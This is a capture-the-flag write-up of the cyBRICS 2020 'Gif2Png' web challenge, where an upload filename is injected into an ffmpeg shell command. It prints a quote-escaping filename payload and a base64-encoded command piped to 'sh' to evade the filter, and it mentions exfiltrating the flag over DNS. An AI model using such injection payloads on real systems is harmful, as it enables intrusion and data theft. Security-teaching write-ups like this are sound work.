Gif2Png is an easy web challenge from cyBRICS CTF 2020, an interesting web challenge that teaches you command injection through image’s filename.
The challenge had the following description/details:
A copy of the original web application’s source code is available on: gif2png.tar.gz
The challenge web page:
It seems that the web application slices the gif into frames and display them on the screen:
So now let’s check the source code of the web application to understand how it is done.
This is the source code of the main file, named main.py:
What caught my attention was the line 104:
This can be very insecure because the web application is passing an user input to be executed as system command. (file.filename)
There’s a small condition that checks for some characters on filename and blocks the upload:
So now we need to exploit this weak point.
The very first thing we need to do is stop the actual ffmpeg command and execute another one, to do this we need to escape the ' quotes and append another command.
I found a way to bypass the filename verification using double pipelines to execute my system command, the malicious filename will look something like this:
MALICIOUS_NAME'||MALICIOUS SYTEM COMMAND HERE||'
There’s a final problem: how to inject system commands through filename and bypass the filename check? Encoding the payload with base64, decoding and executing on the fly!
echo d2hvYW1pO2lkO3NsZWVwIDEw|base64 -d|sh
Unfortunatelly, the challenge server had a firewall blocking reverse shells and requests to the external resources through port 80.
So I came with the idea of exfiltrating the flag (inside the main.py) through DNS using dnsbin.zhack.ca: